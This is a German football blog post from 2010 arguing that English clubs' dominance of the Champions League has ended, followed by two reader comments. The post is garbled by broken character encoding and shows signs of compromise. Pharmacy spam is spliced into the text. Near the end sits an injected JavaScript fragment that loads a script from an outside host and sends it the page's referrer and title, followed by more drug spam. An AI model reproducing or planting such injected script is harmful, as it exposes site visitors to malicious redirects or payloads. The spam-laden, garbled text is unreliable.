Willkommen auf » Ausgegraben – Die Krone Europas
14. Apr 2010

Ausgegraben – Die Krone Europas

Da war doch mal was… vor etwas mehr als einem Jahr habe ich hier im Blog noch beeindruckt auf die unglaubliche Dominanz englischer Vereinsmannschaften in den europAi??ischen Wettbewerben geblickt. Englands Top-4 Manchester United, FC Chelsea, FC Liverpool und FC Arsenal herrschten A?ber den FuAYball-Kontinent, die Premier League galt uneingeschrAi??nkt als beste Liga der Welt, als Ziel eines jeden SpitzenfuAYballers.

Ich fasse den Stand MAi??rz 2009 nochmal zusammen:

– 2007, 2008 und 2009 standen jeweils drei Premier League Klubs im Halbfinale der Champions League
– seit 2005 nahm immer mindestens eine englische Mannschaft am Finale teil
– 2008 gabs sogar ein rein englisches Finale
– zweimal holte man den Titel auf die Insel, 2005 FC Liverpool und 2008 Manchester United
– die FA?hrung in der UEFA-FA?nfjahreswertung schien fA?r ein weiteres Jahrzehnt gesichert

Und wie sieht es heute aus?

– fA?r zwei Teams endete die internationale Saison im Viertelfinale der Champions League, der FC Arsenal musste sich dem FC Barcelona, rund um WeltfuAYballer Lionel Messi, geschlagen geben, Manchester United unterlag mit Favoritenstatus Purchase Buy A?berraschend dem prednisone without prescription india Pills FC Bayern MA?nchen
– JosAi?? Mourinho kegelte mit Inter Mailand seinen Ex-Klub FC Chelsea bereits im Achtelfinale aus dem Wettberwerb
– Liverpool konnte sich in der Gruppenphase der KAi??nigsklasse nicht gegen den AC Florenz und Olympique Lyon durchsetzen, als Trostpflaster musste die Europa League herhalten, das Team steht momentan (ebenso wie der FC Fulham) immerhin im Halbfinale der Europa League (doch es ist und bleibt der „Cup der Verlierer“ ;)).

Tja, geht 2009/2010 nun also Saison des Absturzes der Premier League in die FuAYball-Geschichte ein?

Die GeldbAi??rse sitzt jedenfalls nicht mehr allzu locker auf der Insel. Im vergangenen Sommer verlor die Liga bereits Cristiano Ronaldo (von Manchester United zu Real Madrid) und Xabi Alonso (vom FC Liverpool zu Real Madrid), weitere AushAi??ngeschilder kAi??nnten in den kommenden Monaten folgen (Arsenals Cesc Fabregas wird seit langem vom FC Barcelona umworben, auch Liverpools Fernando Torres zieht es zurA?ck in die spanische Heimat).

Die Premier League bleibt ohne Frage eine Topliga Europas, es mehren sich allerdings die Anzeichen, dass die auAYergewAi??hnliche Dominanz der englischen Klubs der vergangenen Jahre ein Ende hat. Real Madrid drAi??ngt mit unglaublichem (um nicht zu sagen: unverantwortbarem) finanziellen Druck zurA?ck in Europas Spitze, der FC Barcelona kAi??nnte seine besten Jahre gar noch vor sich haben (Lionel Messi ist erst 22 Jahre alt, Andres Iniesta 25, Gerard PiquAi?? 23, Bojan Krkic 19), in Italien ist Juventus Turin mit Buffon, Diego und Amauri zurA?ck, Inter Mailand war nie weg (beeindruckendes und oft vergessenes Detail: der Klub ist in den vergangenen vier Spielzeiten italienischer Meister geworden) und mit dem FC Bayern darf man nach den grandiosen Champions League Auftritten in der laufenden Saison (vor allem dank Robben+Ribery) international auch wieder rechnen.

Das Abo auf die uneingeschrAi??nkte Favoritenrolle von ManU, Chelsea und Liverpool auf der europAi??ischen BA?hne ist jedenfalls dahin… und kommt so schnell nicht zurA?ck…s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “; Cheap Buy buy forzest ranbaxy xm radio advertisers, order generic us viagra combo pack. Purchase Pills pills online erythromycin suppliers in canada order lukol Cheap


2 Kommentare



  1. Ich bin auch nach wie vor der Meinung, dass England mit doch einigem Abstand die Nase vorn hat. Zumindest was die Top5 angeht.
    Arsenal hat gegen die beste Mannschaft Europas verloren
    Chelsea eher unglücklich raus gegen Inter (2 schlechte Spiele reichen zum KO)
    Manu auch eher unglücklich gegen allerdings teilweise starke Bayern raus.
    Aber ausser Barca sehe ich im Moment keinen Club Europas auf Augenhöhe mit Manu oder Chelsea. Natürlich kommen immer 1,2 Clubs jede Saison mit Überraschungen, aber keiner hat über Jahre die Chance eine Dominanz aufzubauen, um 3,4 Jahre in Folge im Viertel- oder Halbfinale der CL vorzudringen.



  2. Die Frage ist natürlich auch, wer soll die englischen Teams in den Wettbewerben denn ersetzen?
    ~~~
    In Spanien hat außer Real und Barca kein Klub die Konstanz, Italien ist auch nicht dort wo es mal war (AC Milan trotz Ronaldinho z.B. kein ganz Großer mehr), in Frankreich sehe ich Bordeaux und Lyon auch nur mit Abstand zur europäischen Spitze, in Deutschland einzig der FC Bayern, in England selbst könnte mittelfristig höchstens Manchester City mit dem Geld der Scheichs das Bild in der Premier League etwas durcheinander wirbeln.
    Den Rest Europas halte ich für deutlich schwächer… aus der Türkei, den Niederlanden oder Portugal wird auch in den kommenden Jahren kein Klub die Champions League stürmen.
    ~~~
    In diesem Sinne bleibt die Premier League bei ihrem Status.
    Auffällig war für mich nur der gleichzeitige „Absturz“ der englischen Top4 nach diesen grandiosen vergangenen Jahren.

Einen Kommentar schreiben